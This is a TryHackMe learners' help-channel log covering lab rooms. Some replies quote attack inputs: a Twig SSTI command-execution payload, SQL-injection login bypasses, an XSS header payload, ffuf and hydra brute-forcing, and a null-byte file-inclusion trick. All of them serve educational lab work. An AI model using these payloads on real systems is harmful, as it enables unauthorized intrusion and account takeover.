#room-hints

1 messages · Page 14 of 1

exotic wagon
#

I’m doing the room “The Great Disappearing Act” and found two possible passwords. Not sure if they’re real, so I need someone who’s done this room

still umbra
#

Any help on windows priv escalation. I've run these commands word for word. I even just tried to copy and paste +modify them all. My lisenter isnt catching anything. It's start to annoy me I've done it 3 times so far

#

I tranfer file, rename old one. Copy my rev shell and restart the service and nothing each time

#

Fuck me nevermind, i was using powershell this needs to be done in cmd.... RIP. its always some shit like this that will trip me up for an hour

hasty heart
#

Sorry @brittle pine I haven’t started nor completed that room yet. Did you make any progression since your post? Best of luck friend

hasty heart
swift thorn
hasty heart
limber arch
#

Okay please tell me I'm not nuts but I'm currently doing "The Great Disappearing Act" and I keyed in the password to Unlock Hopper's Memories but where do I go next?

frail halo
sleek scarab
#

Hey i'm so stuck on active directorys task 4 its making me pull my hair out

#

Directories**

frozen hollow
#

any hints for upload vuln room task 8, i cant find out how to do it and echos hint is kinda useless

#

nvm i got it

blazing kindle
#

The AI calendar is kicking my butt. I just can't seem to get the request formatted correctly.

candid meadow
#

Hello, i got a little problem
The second question in task 6 of the unified kill chain room, i answered it correctly but it's still having a space remaining and I'm pretty sure i typed the correct the answer

barren cloak
#

I cannot see the email analysis files, even after restartting the attack-Vm , for this section SOC Level 1
Phishing Analysis
Phishing Analysis Fundamentals

#

and how do we upload images here ?

hoary moth
hoary moth
kind prawnBOT
still anchor
#

What is the netstat parameter in MS Windows that displays the executable associated with each active connection and listening port?

still anchor
acoustic zodiac
#

It is

coral shell
#

Anyone working on Hoppers Origins from Advent of Cyber that can help with the direction of Server1 Admin? I've exhausted everything and I feel my sanity slowly draining.

stone portal
#

@coral shell For Server1 Admin, don’t brute-force or chase credentials. The solution is in careful enumeration on Server1. Look closely at running services/processes, and inspect any config files, scripts, or scheduled tasks tied to admin-level services. There’s a small misconfiguration / overlooked file that gives the direction forward. If you’ve checked everything once, re-check auto-run scripts and writable files.

haughty basalt
stone portal
#

@haughty basalt You’re already at the right place — now go back to enumeration:

Check Server1 again, especially anything related to Asylum (configs, scripts, environment variables).
Look for hardcoded creds, tokens, or references inside:
Web app files
Config files (.conf, .env, backups)
Cron jobs / startup scripts

Pay attention to files readable by your current user but used by an admin-level service.
If the login page exists, the credentials are usually stored somewhere locally, not meant to be cracked.

In short:
👉 The Asylum credentials are revealed through misconfiguration or leftover files — not through attacking the login page itself.

untold gust
#

.

hearty fossil
#

Hi all, anyone completed the Hoppers Invitation side quest?

hearty fossil
#

I am going crazy here!! ANYONE worked on the Hopper's Origin invitation?

trail gull
#

Does anyone know which ".json" file is correct for the PS ECLIPSE room? This room is for using Splunk to investigate ransomware activity. Thanks.

hoary moth
hearty fossil
hoary moth
boreal tendon
#

Big shout out to @hoary moth - eveytime I get stuck on a room, I search for the problematic task here, because people have had the same issues previously, and almost every time KGB has provided the support to the issue. Thank you, I appreciate it.

green minnowBOT
#

Gave +1 Rep to @hoary moth (current: #1 - 6054)

green minnowBOT
#

Gave +1 Rep to @boreal tendon (current: #3459 - 1)

fleet quiver
stone portal
fickle zealot
#

hi sir, I have been stuck on the hammer room, I just find the web port is 1337, and find some path which is available, two login page, and some other pages, and canot find a way to grab the flag how to get to the dashboard, can you give me a hint ?

#

@stone portal sir ,can you help me , hi sir, I have been stuck on the hammer room, I just find the web port is 1337, and find some path which is available, two login page, and some other pages, and canot find a way to grab the flag how to get to the dashboard, can you give me a hint ?

frosty gazelle
#

Hi sorry for bothering you guys but can any of you hint me on how to access the side quest machines in AoC I have Key1 and Key3 but can't access there relative machines every time I try I get this error

stone portal
# fickle zealot <@1397945393811034122> sir ,can you help me , hi sir, I have been stuck on the h...

Maybe This Walkthrough Will Help U To Figure Out Your Issue - https://www.youtube.com/watch?v=Y8-ahp7mnLI

Welcome to the Hammer TryHackMe Walkthrough! In this video, we'll dive into a medium-difficulty room where your goal is to bypass authentication mechanisms and achieve Remote Code Execution (RCE) on the system. With the Hammer in hand, we'll explore various techniques and strategies to crack this challenge.

Whether you're new to TryHackMe or an...

▶ Play video
hardy gale
white salmon
hardy gale
stone portal
#

@hardy gale In Injectics the SSTI is Twig, which blocks direct PHP function calls, so {{ passthru('id') }} throws an error.

The payload {{ ['id',''] | sort('passthru') }} works because Twig’s sort filter accepts a callback function. By passing passthru as the callback, Twig internally calls passthru('id'), executing the command.

So it’s an indirect function execution via filter callback, which bypasses Twig’s sandbox restrictions.

stone portal
hollow olive
#

yellow, so either am stuck becaue of a glitch or am just probably stupid (https://tryhackme.com/room/introtodockerk8pdqk)
in this room task 7, flag, i am unable to get it. As far as i understood i should do this "docker run -d --rm -p 80:80 --name webserver webserver"
then "curl https://10-80-178-219.reverse-proxy.cell-prod-eu-west-1a.vm.tryhackme.com/" but no progress was made, please tell me if am doing smth wrong
nvm fix
(i was supposed to unlock the webpage in my local browser but my dumbass thought i was supposed to curl smth)

potent anchor
hollow olive
#

I thought they meant connecting in the vm, which was only a terminal so i thought they meant to curl it (still kinda dont know how curl works), but then i just pressed the link and voila the flag was bright as the sun

#

and yes --rm wasnt needed, i was just trying to re download it because i thought it glitched

mighty grove
#

Heya ... I am in the Linux Live Analysis room and in Task 6: Hunting for Processes I somehow don't get any results that help me to answer the question. The first question asks for a process running from the /tmp/ directory but even if I list all processes there is no process with this path. I continued on and it remains the same for the next tasks. Am I missing something?

#

nvm ... forgot to switch to sudo 😕

wanton spindle
#

Hello! I am on the Linux Fundamentals 3 module 6 on crontab. I have been stuck for over an hour on the question “when will the crontab on the deployed instance (ip address) run?”
I believe the answer is in the crontab -e being 05**1 however the answer space in 7 spaces long and the echo AI is not being helpful

wanton spindle
#

Update! I was misreading the question! I got it

spare musk
#

So I'm currently working on the Buffer Overflow room.
I just finished task 8 but wondered, that while using a disassembler (used gdb and radare2) I could not successfully call the setreuid syscall to set the uids to user2. After the first syscall, rax raises errorcode -1 and the shell afterwards gets called but still for user1.

Running the binary with the payload by itself works just fine calling a shell for user2.

Is this due to some protection level in the disassemblers or is this a mistake somewhere else on my side?
(attached disassambled shellcode)

distant gazelle
stiff cobalt
#

Can anyone provide more to go on for the into to web hacking > File Inclusion. Specifically for flag3? It looks like when you do a POST with curl it won't strip out the directory traversal but it's adding .php onto my flag3 path. I've tried experimenting with all sorts of user-agents, Referer, X-Forwarded-For including malformed urls, content-types. I've been able to get all the other flags for the exercise.

stiff cobalt
#

@lucid junco I was able to get it to work by sending a URL-encoded null byte at the end of the string. This prevented in the include from appending .php in the eventual OS system call for file open

rough minnow
#

hello can anyone help me out of this, this url doesnt display in the browser
You should have found a secret page that allows you to add funds to a bank account (http://fakebank.thm/bank-deposit). Type the hidden page into the FakeBank website using the browser's address bar.

stone portal
stone portal
rough minnow
#

@stone portal I got it! thanks so much

green minnowBOT
#

Gave +1 Rep to @stone portal (current: #217 - 49)

stone portal
tulip zealot
#

(juicy room)
how do i get the internal panel flag???
juicy has not returned the answer at all with a lot of tries, do i just keep asking this request with different wording?

uncut bolt
serene gull
#

need some hints for finding the vulnerability in the room Jax sucks alot... all i could find was that there was a session cookie encoded in base64 which in decoding looks like this

{"email":"admin@gmail.com"}

i entered the input admin@gmail.com and got this in the session cookie

hoary moth
obsidian crescent
#

HI there,
am stucked in SOCL1 Alert reporting The question is What flag did you receive after correctly escalating the alert from the previous task to L2? Note:If you correctly escalated the alert earlierjust edit the elart and click "save" again
MY ANSWER IS
THM{nice_attempt_faking_microsoft_support} But it says incorrect answer search on internet and medium.com website blog also show this answer. CAN ANYONE PLEASE HELP ME IN THIS QUESTION

keen scarab
cloud niche
#

Python for Pentesters Room, Task 2, Subdomain Enumeration:

The python script is fine, when I created a subdomains.txt file and added the items in the image, I was able to get a response from using google.com.

The intro says to do the Python Basics before, which I did.

What's missing:
In Task 2 for the subdomain enum, it doesn't cover the command needed to run the script, which requires you to add the target (python3 subdomainenum.py <target>). I figured this out by my method of 'screwing around'.

If you go to Task 3, it says 'Once subdomains have been discovered' which nothing in Task 2 ensures you've found one and if you use the list they provide in the image, no subdomains are discovered either.

Task 3 is cool in that it shows the command needed to get your work done.

Just sharing this here as I continue through the module and in case someone else gets a little stuck. Fun course though, just wanted to share my experience.

#

Guess I'm done with Python for today.

#

Other rooms open, but this one is broken for now.

idle maple
#

Hey guys so im on Authentication Bypass room and ive created a valid usernames txt file and filled it with a bunch of other usernames i found ab a hundred or so but i ran this command:

ffuf -w /root/Desktop/valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.64.157.229/customers/login -fc 200

It worked just fine the problem is i got 0 hits on the passwords and or usernames i was under the impression that attackbox would have the password for the site somewhere in the file or was i wrong and i need to find like 1000 from the internet?

covert badge
#

Hello?I'm new here

idle maple
#

i dont have it anymore but it didnt have any errors it ran all the names and it was just empty the only thing that was there was the command and the stuff it ran

potent anchor
idle maple
#

i was under the impression your supposed to fill the document with a bunch of possible names

potent anchor
idle maple
#

oh so the names from the previous task i should put in

potent anchor
#

(edit: signup page)

potent anchor
idle maple
#

ah okay i just put in a bunch of random usernames i found on the attackbox

#

i didnt think it was that straight foward

#

i was overthinking it

#

thx for your help (sorry im abit slow at this😂 )

potent anchor
#

Well, you still need to start with a list of generic names (the signup) to find out which ones to keep in the second step (the login).
Here is tip that seems absent from the Username Enumeration task: adding ... -s > valid_usernames.txt to the ffuf command will build your file silently, without the ffuf comments.

idle maple
#

ok ill try that thx

lucid junco
fickle zealot
#

hi sir: I am afaid I have ruined the Include room, I follow the guide of the chatgpt, and put in some payload and I am afraid I have ruined the backend of the platform, it is now not work now,

#

sorry it is DOM based attack room, not include room, it is now runied

#

and for the include room, I can not finish it , some Yotube poster have suggested use the maillog poisioning and ssh posioning, and it is seemed that vulneralbility have been repaired already and it is not work now, I hope you can give me some further hint in getting its final flag

lucid junco
serene gull
#

need a hint for the room Rabbit Store. how do i find the credentials for the login page at the subdomain storage.cloudsite.thm?

serene gull
green minnowBOT
#

Gave +1 Rep to @lucid junco (current: #2 - 3936)

distant crag
#

i need a hint for the first shift ctf of task 2, how do i find the answer of the question

stone portal
serene gull
#

hello guys, in the CTF Madeye's Castle i am getting a 500 error on visiting the http://hogwartz-castle.thm website even after adding it to my /etc/hosts file. i could access the default apache page at http://<target_ip> but it seems that i cannot access the website with the domain name. after checking the writeups i found out that i was the only one facing this problem.

golden harness
#

Hello, im stuck on room - session management task6 i can see all students tab when i change the cookie userRole but not the flag of user ''x'' what im doing wrong? i have seen others walkthroungh's and in everyones they get the id 11 and i always 8...

polar quarry
#

this one pains me to ask as im sure im going to kick myself:
hxxps://tryhackme.com/room/nmap

What is the non-numeric equivalent of -T4?
T4 aggressive (Its not this but fits the space perfect. )

#

[Resolved]
God im going to bed at this rate lol
-T aggressive

sharp nova
#

hey looking for some guidance in offensive seciurity module 1 task 3 if anyone can help lmk!

jagged otter
#

somebody help me i cant do a recap lol

Which command would properly create a forensic image of a compromised disk while preserving evidence integrity?

#

i tried the ftkimage, dd, dcfldd nothing works

fleet pike
#

@jagged otter Simplest could be dd if=/dev/disk/by-id/(device partition here) of=/path/to/locationofsoontobeverylargefile bs=(size, align with your topology x 1000) (try to keep it at least 10MiB)
then watch -n 30 killall -USR1 dd in another window

That makes an exact copy of everything on the designated block device.

"Forensic" image dumps just hav a bunch of fancy dates and checksums. Is this for legal purposes or just learning to make backups

#

@jagged otter dont forget the sudo 😉

rare kraken
#

hello, need help with this room
https://tryhackme.com/room/res

TryHackMe
Res

Hack into a vulnerable database server with an in-memory data-structure in this semi-guided challenge!

#

i can't find the binary to escalate, and yeah i did read the wrteups and still no help

hoary moth
rare kraken
#

Post exploitation

#

Need to escalate but couldn't

devout remnant
#

Regular Expressions room. I solved all tasks but been stuck with this for a while now.

#

I tried couple of regexes none worked (Couldn't include the last '1')

#

||\.*\S+ ||this one looks like it works but still not correct

#

w also works but still not the correct answer

potent anchor
ornate swan
#

Hey! I am in a room Digital Footprint and i am stucked at task 2, need a nudge in the right direction

#

nevermindfoundit

tropic garden
pale dune
#

Hey guys hope you all are doing well,

I just started the SOC Fundamentals and im stuck on this room. I answered all the W's except one. Would any one be able to assist me?

Thank you

pale dune
green minnowBOT
#

Gave +1 Rep to @hoary moth (current: #1 - 6083)

distant grail
#

Hey friend , what is the methodology to use in room message to Garcia.

plucky light
#

Digital Footprint room - The Leaked Photo. I have found the street address of the picture but when i enter the THM{city} flag it is not working. i have tried every combination i can think of (case sensitivity/spaces/punctuation/city.vs.suburb). Am i missing something and off the track? any help appreciated thankyou

distant grail
#

There is office name.

#

Yes there is city neme in first letter cap and all small

plucky light
#

still no luck i must have something wrong

hearty oyster
#

Is there any error in "Digital Footprint" -> "task 2 Archived Company Website". I was also surprised by Task 1 because the GPS coordinates are wrong (I know the city). There are no other obvious clues that would actually lead to the house. From my point of view, this isn't "easy".

regal knot
regal knot
plucky light
green minnowBOT
#

Gave +1 Rep to @regal knot (current: #746 - 10)

strong lake
#

room/caseb4dm755task 6 question Including hidden files, how many files are currently stored on the flash drive?:
The number I'm counting is not single-digit as the answer field suggests. What's the right way to count files here?

sterile cedar
#

Hi there, I'm doing the room SOC Alert Triaging - Tinsel Triage, but for task 5 I can't access / find any logs. It might be because of the layout differences, like I can't find anywhere mentioning Events at all unless maybe its under a different name

potent anchor
potent anchor
shadow scroll
#

currently doing hoppers origins network. i found the flags for: web, db, server1, server2 and ai.vanchat.loc. now i am stuck and i have no idea what to do next (or maybe i just need sleep)

sly sequoia
#

Just started on try hack me and on task 4 in Offensive Security intro the balance isn't going into a + even though I'm following what it asks and comes up saying what I've done is correct.
Fixed it

wraith fractal
#

I am in the File Inclusion room (first intermediate room), and I am having some trouble with trying to figure out the challenge answers even though I have done all the previous questions along with looking at walkthroughs for the room. I just want to be able to do it on my own, so I decided to not just ctrl+c ctrl+v the answers :3

serene gull
#

hello guys i am finding difficulty in fuzzing rest api in the CTF bookstore. half the write are using wfuzz to fuzz it. but i want to use ffuf to enumerate the api. is it possible to fuzz api with ffuf or am i supposed to use wfuzz only like the others?

chrome sail
#

Hello

sudden dagger
#

Hello, im doing Road ctf, and i have some problems, can someone help? Thanks

valid bone
#

Can somebody tell me why I cant do azure labs after paying 35 Dollars extra? I alrdy reloaded the page too? I purchased "Cloud license access"

calm tide
#

guys i'm in Upload Vulnerabilities room, i follow the steps and set the etc/hosts file, but i continue to get this:

Please read the instructions in task one. You must access this server with one of the following virtual hosts:

overwrite.uploadvulns.thm
shell.uploadvulns.thm
java.uploadvulns.thm
annex.uploadvulns.thm
magic.uploadvulns.thm
jewel.uploadvulns.thm

Refer to the instructions in task one for more information

someonle can help me?

idle shadow
#

i need help in Wireshark: The Basics task 5 question 2

stone portal
supple steppe
#

Chocolate-Factory: If your using vpn connection and your running kali, root.py wont run, it just errors and you cant load missing imports. just rewrite root.py for python3 and your done.😀

echo terrace
#

@calm tide Try launching room machine and wait +/- 15 min for it to load. Then you should configure the /etc/hosts file on your machine (e.g. AttackBox).
To access a specific website for example: overwrite.uploadvulns.thm, try add http:// before the website address.

idle shadow
stone portal
kind prawnBOT
kind prawnBOT
ebon citrus
#

where can i get my certificate on love at first breach?

zenith void
#

What command would you use to perform content discovery on the website http://10.10.10.5 using ffuf with the common.txt wordlist?

Hi, any idea why this answer is not correct? Question from recap

ffuf -u http://10.10.10.5/FUZZ -w common.txt

potent anchor
potent anchor
# zenith void Yeah

Your command seems ok to me.
Seems to me that Echo needs some tuning. So I guess you need to guess how it came up with your question to figure out the expected answer.
But before that, try silly alternatives like : ffuf -w common.txt -u http://10.10.10.5/FUZZ or ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.10.5/FUZZ . Also in other intro rooms show how to define another keyword such as NORAJ instead of FUZZ, like in ffuf -u http://MACHINE_IP/NORAJ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt:NORAJ

austere lantern
#

Hi everyone, which rooms do you recommend for training before tackling Investigating Windows room?

vernal latch
green minnowBOT
#

Gave +1 Rep to @vernal latch (current: #302 - 34)

vernal latch
glacial tiger
#

Hey. So I'm trying to do the tcpdump basics room right now. My issue is that to answer the questions I'd need a traffic.pcap file which is not available on the machine and there is no command to my knowledge in task1-2 that would create it

#

Could someone help please?

vernal latch
glacial tiger
#

Nothing returns. Could only send img from phone

vernal latch
glacial tiger
#

I'm on attack box and this is my 2. try but ok. Gonna try restarting it

#

Thanks

vernal latch
balmy badge
#

Hey guys

vernal latch
balmy badge
#

Sup

odd hazel
#

Assalaam o Alaaikum ! I'm Samavia I have a confusion about task 4 "Attack the admin page". Guys can you all please help me solve this? I’m not understanding anything.

vernal latch
lucid junco
#

Please don't post flags in chat.

#

It ruins it for members.

vernal latch
odd hazel
vernal latch
lilac stream
#

any hint on Operation Endgame room..?

vernal latch
digital cairn
#

Anyone got a tip for "Azure: Can you GA?" Task 2 last question "What is the user flag?".

vernal latch
digital cairn
vernal latch
alpine kernel
#

Hi, m I allowed to post the operation endgame machine writeup

vernal latch
unique hound
#

hello, I am going through the owasp juice room and I am on task 4. Am I gonna wait this or what? Whenever I click the OK button, the intruder closes. Should I wait till its done?

vernal latch
unique hound
#

how am I gonna see the status code sir?

#

it wont let me click it

vernal latch
#

Intercept login request then Send to Repeater
Go to Repeater tab
Click Send
Look at top right then HTTP status
401 means wrong
200 means correct

unique hound
#

but the room is doing the intruder

vernal latch
unique hound
vernal latch
unique hound
#

I dont think ive encountered hydra. Not sure, but I will try. Thanks sir

vernal latch
#

If anything errors out just drop the message I will fix it for you

unique hound
#

thank you sir. I will

#

@vernal latch I managed to see the password, its admin123. Thank you sir. I am advancing now in task 5

green minnowBOT
#

Gave +1 Rep to @vernal latch (current: #202 - 53)

unique hound
vernal latch
unique hound
#

I will send it here. Ill just try to solve it on my own

#

thank you

vernal latch
#

Good luck

unique hound
#

Hello, I am now in task 7. Ive already done the xss inframe but there are no flag. Where do I get it?

#

already ran a new machine

#

performed a DOM XSS

#

nvm, I just need to copy paste it. I manually copied it. XD

unique hound
#

added the header but it the xss wont show

vernal latch
# unique hound

Turn intercept ON then logout then catch request then add
True-Client-IP: <script>alert(1)</script>
Forward it login as admin open Last Login IP then XSS should pop.

unique hound
#

okay, wait ill try

unique hound
#

?

#

turned it off, nothing happened

vernal latch
#

Then log in as admin and check Last Login IP

amber summit
#

Heyy

#

I want to make phishingg page?

#

So which is best option ! 1 i make own clone page ya i use tool?

#

Give me some suugeestions my heross

vernal latch
lucid junco
#

Users*

lucid junco
vernal latch
lucid junco
vernal latch
lucid junco
#

It's illegal point blank.

vernal latch
amber summit
#

@vernal latch okay okay

#

Iys illegal

amber summit
#

So dont teach me how

fluid prairie
unique hound
#

I got frustrated yesterday and it was lunch time so I did not finish it

unique hound
#

nice it worked XD

vernal latch
dim cargo
#

Greetings, just wanted to know if "Easy" is the correct level for the "OWASP Top 10 2025: Application Design Flaws" room, as it's giving me a throbbing headache, and it gets worse when this room belongs to CyberSecurity 101... really frustrated at this point...

unique hound
#

hi guys, im doing web enumeration. Should I make a directory first?

#

nvm, just followed the instructions lol

idle shadow
vernal latch
idle shadow
#

yes

vernal latch
#

It is displayed at the bottom right-side of the status bar.

idle shadow
#

thank you so much

vernal latch
#

Anything else?

#

@idle shadow

idle shadow
#

no just that thank you

vernal latch
#

Ok fine

idle shadow
#

if i need anything else i will text you

vernal latch
#

Ok 👌

dim cargo
#

Hello there, Need help for room OWASP Juice Shop, Task 3 Inject the juice, what should I put as answers in both the questions there???
Question #1: Log into the administrator account!
Question #2: Log into the Bender account!
Thanks in advance

#

oh...nvm, forget my question... 😅

vernal latch
#

Log into the administrator account
' OR 1=1--

Log into Bender account
bender'--

gritty panther
#

@remote monolith

onyx hull
#

yoooo

whole herald
#

My Wazuh room doesn't display the number of security events for a specific host. Even though I've read the guide and followed all the steps, I still get the "data not found" message. Is this a bug, or am I doing something wrong?

vernal latch
#

Click the time range calendar
Set Absolute time to include March 11 2022
Keep filter agent.id: 001
Click Refresh
Then the Security Events count will appear

vernal latch
whole herald
#

Please tell me how to do this, I don't see a mechanism to remove the filter🥲

vernal latch
whole herald
#

For testing purposes I created a new filter that can be deleted, but the manager.name: ip-10-112-144-207 field is not deleted.

vernal latch
whole herald
vernal latch
#

including task

whole herald
vernal latch
# whole herald

Open agent-001 from the agents page then go to Security Events then change the time filter to Years ago then refresh the search then the dashboard shows 196 Security Event alerts generated by AGENT-001

#

see dms

whole herald
green minnowBOT
#

Gave +1 Rep to @vernal latch (current: #131 - 79)

fleet pike
#

https://tryhackme.com/room/machunt
Question: Which network did jake connect to after reading the instructions in the pdf?

I found the pdf, it referenced a file, i found traces of the file in the trash, 7z x'd it to see its contents. and then looked at the payload, I can't find any persistent trace of a file referenced from that script.

TryHackMe

Utilize your macOS investigation skills to reveal the mystery behind a compromise.

vernal latch
tranquil sandal
#

Hi guys Im going crazy of the recap topics and how buggy they are. On the question: what Gobuster command would you use to enumerate directories on the target http://example.com with the wordlist /usr/share/wordlists/common.txt. I keep getting wrong answer when.i write gobuster dir -u http://example.com -w /usr/share/wordlists/common.txt

#

It's annoying

#

And that's not the only one

#

There are some 2 other recaps

#

Extremely stupid

vernal latch
# tranquil sandal

gobuster dir -u http://example.com/ -w /usr/share/wordlists/common.txt

#

http://example.com/ with / at the end

#

recap questions are not buggy but extremely strict with formatting 😅

tranquil sandal
#

But in their question there is no /

#

That's why i didn't put it

vernal latch
tranquil sandal
#

I tried both with / and without

#

Nothing works

vernal latch
potent anchor
# tranquil sandal Nothing works

Have you tried with quotes or double quotes? Like
gobuster dir -u "http://www.example.com" -w "/usr/share/wordlists/common.txt"
Also I'd try with .thm because one of the literal text in the room is
gobuster dir -u "http://www.example.thm" -w /usr/share/wordlists/common.txt
Finaly try with -r like in room:
gobuster dir -u "http://www.example.thm" -w /usr/share/wordlists/common.txt -r

tranquil sandal
#

@potent anchor unfortunately I tried many combinations it might be just broken. Come on, how hard is the gobuster syntax😀

#

anothe one thats killing me is this one. And i tried variations of curl, ping and nc.

tranquil sandal
#

Nope

potent anchor
potent anchor
# tranquil sandal

so many variants and the question lacks context: is there a firewall? is it a windows server? A bank would also use TLS, etc. The solution could involve telnet, a script, etc. My snapshot is what an LLM suggested to that same question: it even suggests wget! I guess the point is testing if the application itself responds: could it be a websocket, an API, etc.
Another LLM suggested curl -I -s -o /dev/null -w "%{http_code}\n" https://bankgpt.example.com

tranquil sandal
agile sparrow
#

Someone knows how to pass the question from the recap in the Security Solutions room(Cybersecurity 101 course)
Id of the question is 69b736dfb6b931269fa0b1d4

Question is

What Windows Defender Firewall command would you use to create a new outbound rule blocking TCP traffic on port 443?

I am stuck cause it was a GUI program in the example, without any commands, just interface

potent anchor
agile sparrow
long hollow
#

can somebody give me a hint for this room i am completly stuck with that container thing

vernal latch
kind elk
#

where can i find answer for this question?

bronze shore
#

Hello guys! Im on the moniker link room, in the exploitation part, and I can’t make the responder to capture the hash

#

Im using RDP through remmina. I’ve tried everything but the responder doesn’t listen. I’ve tried to use tcpdump just to see if the connection was being made, and it is live

regal knot
#

If I had to guess - it is the syntax error in the exploit.py script provided. It should be: file:///\\YOURATTACKBOXIP/test!exploit

tropic garden
kind elk
bronze shore
#

It was not the script. I was able to run it through the attack box though. Thank you nonetheless

#

As I stated above the tcpdump was able to capture each time the link was clicked on the windows machine, so there was no error in the script. The problem seemed the responder itself, either version issues or some ports on my machine. Solved it by running the attack box instead of through VPN

charred sapphire
tropic garden
charred sapphire
tropic garden
white salmon
#

Bonsoir everyone

vernal latch
white salmon
#

Yeah, I was expecting you

vernal latch
white salmon
#

....

white salmon
vernal latch
delicate cosmos
#

can i ask someting about the OSINT Level 3 iam stuck on a answer the i will have finished OSINT Level 3

grizzled tiger
#

hey guys, any hint about how to complete last task from chocolate factory room ? It's completely broken

grizzled tiger
#

It’s all good thanks ! I used a fernet decoder online it worked as an alternative

gusty jolt
#

Does it have something to do with the source code you have to download? W1seGuy. Feels like I'm missing something

near mist
gusty jolt
#

cause when I downloaded it the first time it downloaded w1seguy.htm and I spent AN HOUR looking through everything

near mist
#

no the python script from task 1 is relevant. It contains the encryption algorithm which helps you creating the decryption algorithm.

gusty jolt
#

now I got the py code

#

yeah I got the py code when I click download this time but the first time I somehow got the html file?

#

now it make sense why the source code is relavent

near mist
#

i guess you did rightclick "save as". Your browser then downloads the html of the page you are on so you downloaded the HTML of the Tryhackme room ^^

gusty jolt
#

maybe i cant remember

#

but yeah I know where to go now. Thanks

white atlas
#

Anyone having trouble with the box THM - Res? I solved it. As you all know xxd no longer has the SUID bit. The way I solved it was by getting the username from /home when I got the shell, and then using Nmap Scripting Engine to bruteforce ssh for username:rockyou.txt and then escalating with sudo su

white atlas
#

Tag anyone else having issues. I left my hint ambiguous and left out the UUID and command syntax to let people learn, but this solution works 💪 unsolvable box = solved ✔️

dusty lintel
green minnowBOT
#

Gave +1 Rep to @white atlas (current: #3700 - 1)

white atlas
green minnowBOT
#

Gave +1 Rep to @white atlas (current: #2404 - 2)

white atlas
#

Hilarious that I solved it with nmap of all tools

austere lantern
# white atlas Lmk if you guys get it working with nmap NSE

Hi, I tried and it works with nmap NSE, but I prefer Hydra because it's faster.
Anyway, I was close, before your suggestion I was trying hydra, but due to a typo with the user I waited too long and killed the process, I was tired I didn't notice the typo. Thank you very much for your advice.

green minnowBOT
#

Gave +1 Rep to @white atlas (current: #1818 - 3)

white atlas
#

Yes its def easier with hydra, I just did it with nmap for fun.

lament island
#

solution found ✅

sharp kayak
#

Where do i find documentation or playbooks for Process alerts in soc simulator? How do i know if a suspicious parent child relationship process creation is malicious? I have no playbooks available.
Do i have to find my answer from external sources outside THM?

snow flare
sly pewter
#

Hello everyone, so, I tried completing the. Active directory part and when they asked me to connect on the Phillip user, I have tried doing it with the PowerShell and the RDP vendor, both are saying that the user does not exist, Idk if I'm doing something wrong

tropic garden
vagrant citrus
#

hi

hard lily
#

Anyone got any hints about the first answer on the new have a break room? it says its the google maps exact name but ive tried literally every single gas station full address name and none of those seem to be working for some reason, i thought i just mistook the gas station but that doesnt seem likely with all the ones ive tried up until now

hard lily
green minnowBOT
#

Gave +1 Rep to @lucid junco (current: #2 - 4013)

limber arch
#

someone please given me a hint for question 2 of 'Have a Break' i think i got the answer but was wrong

dusty cradle
#

how are we supposed to find the full name of the culprit 😭

sacred bay
#

Any hint for room3 task 5?

tropic garden
tough oyster
#

solving this room https://tryhackme.com/room/splunklab

i am at task 6 i did evry thing i can see the events in spunk whent to sourcetype: syslog
it doent allow this answer its only _ _ _ _ 4 when to read some walkthrows they all set it as syslog i am unable to solve this room

#

ah ok finaly solvet they needed defrent log source thats why

mental moth
#

Use any Text Editor and edit the content of the read_secret.sh. Inside that file, write a script to read the contents of secret.txt. What is inside secret.txt?
-rwxr-sr-x 1 root perm : read_secret.sh
-rw-r----- 1 root perm : secret.txt
how to change permission?
i use sudo need password but shows student is not sudoers file

tropic garden
snow flare
olive locust
#

hey! I am doing https://tryhackme.com/room/networkingcoreprotocols room but I am stuck on the pop3 task-7
The challenge requires me to pull 4th message from the server but when I telnet on port 110 and try to RETR 4, it throws error

telnet 10.49.172.216 110
Trying 10.49.172.216...
Connected to 10.49.172.216.
Escape character is '^]'.
+OK Dovecot (Ubuntu) ready.
AUTH
+OK
.
USER linda
-ERR [AUTH] Plaintext authentication disallowed on non-secure (SSL/TLS) connections.

I have tried openssl and that fails with renegotiation error

openssl s_client -connect 10.49.172.216:995 (as well as 110)
+OK Dovecot (Ubuntu) ready.
AUTH
+OK
PLAIN
.
USER linda
+OK
PASS Pa$$123
+OK Logged in.
RETR 4
RENEGOTIATING
ERROR
4027AD8F1F7F0000:error:0A00010A:SSL routines:can_renegotiate:wrong ssl version:../ssl/ssl_lib.c:2892:

I have tried forcing tls 1.2 as well but no go there. Curl is also failing.
Any idea what's up here. The example simply telnets on port 110

#

nevermind - known bug and closed

plain oar
#

operation takeover - is frr and vtysh the right direction?

regal knot
plain oar
regal knot
halcyon tartan
#

Hey guys am new here, how are you all doing.

vernal latch
grizzled surge
#

Hi im new here and i wanted to ask if the linux fundamentals 2 ad 3 are supposed to be under paid subscriptions

halcyon tartan
#

Does hacking pay ?

#

I almost got my ip and info leaked 😭😭🫡

#

But also got $5k from a random gig

#

Anyone know how to make serious money hook me up asap 🫡😈😝

analog skiff
halcyon tartan
#

Maybe yall ain't using your abilities to the full potential

analog skiff
lean thicket
#

Hi i'm doing the rooms hammer , i forged the jwt token , but it keep saying me that the token is invalid

robust hearth
#

that white rabbit ai room is killing me got flag 2 and 3 no clue what that first onbe should be but i've escaped xD any hints or tips?

robust hearth
#

nvm found it in the most convoluted way XD

vernal latch
knotty temple
marble orchid
high ledge
#

hi
I’m experiencing a recurring issue with the lab machines across multiple rooms.

The problem is:

The machine expires immediately after I click “Start Machine”
Sometimes I get redirected to a “Page not found” error
This issue is happening in multiple labs, not just a single room

What I’ve already tried:

Restarting machines (Terminate → Start)
Reconnecting the VPN
Logging out and back in
Refreshing the browser and clearing cache
Trying a different browser

I also noticed that when I access TryHackMe from Kali Linux, everything works normally. The issue only happens on my main system.

My VPN connection is working correctly, so I believe this may be a platform-side issue or related to my environment.

This issue is preventing me from continuing my learning progress.

Could you please check and assist?
(Expires 0m 0s)
Thank you.

livid gull
#

Hey everyone, I am currenly in pre-security course, module 2 ( Defensive security). I am given a site in which there is some suspicious thing I have to identify in the lab. I have to put the IP address but i can't find the IP address.

shy kayak
#

@robust hearth have you completed the jailbreaking room yet in the AI path?

tropic garden
kind prawnBOT
livid gull
#

